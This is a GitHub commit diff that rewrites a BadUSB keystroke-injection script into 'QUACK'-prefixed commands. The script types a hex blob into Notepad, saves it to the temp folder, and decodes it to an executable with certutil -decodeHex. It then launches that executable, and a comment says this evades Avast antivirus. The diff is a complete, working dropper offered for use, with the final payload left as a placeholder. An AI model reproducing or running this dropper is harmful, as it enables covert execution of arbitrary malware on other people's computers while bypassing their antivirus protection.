pull/638/head
Aleff 2023-07-22 09:59:23 +02:00 committed by GitHub
parent 3a9b3c0e51
commit 78b59bcedc
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 29 additions and 29 deletions

View File

@ -18,35 +18,35 @@
* - Running checked but not blocked by Avast antivirus * - Running checked but not blocked by Avast antivirus
GUI r QUACK GUI r
DELAY 1000 QUACK DELAY 1000
STRING notepad.exe QUACK STRING notepad.exe
ENTER QUACK ENTER
DELAY 2000 QUACK DELAY 2000
* Define here your hexadecimal code * Define here your hexadecimal code
STRING #HEX_CODE QUACK STRING #HEX_CODE
DELAY 2000 QUACK DELAY 2000
ALT F QUACK ALT F
DELAY 1000 QUACK DELAY 1000
STRING S QUACK STRING S
DELAY 1000 QUACK DELAY 1000
STRING "%TEMP%\example.hex" QUACK STRING "%TEMP%\example.hex"
ENTER QUACK ENTER
DELAY 1000 QUACK DELAY 1000
ENTER QUACK ENTER
DELAY 1000 QUACK DELAY 1000
ALT F4 QUACK ALT F4
DELAY 2000 QUACK DELAY 2000
GUI r QUACK GUI r
DELAY 500 QUACK DELAY 500
STRING certutil -f -decodeHex "%TEMP%\example.hex" "%TEMP%\example.exe" QUACK STRING certutil -f -decodeHex "%TEMP%\example.hex" "%TEMP%\example.exe"
ENTER QUACK ENTER
DELAY 1000 QUACK DELAY 1000
ENTER QUACK ENTER
DELAY 1000 QUACK DELAY 1000
GUI r QUACK GUI r
DELAY 250 QUACK DELAY 250
STRING "%TEMP%\example.exe" QUACK STRING "%TEMP%\example.exe"
ENTER QUACK ENTER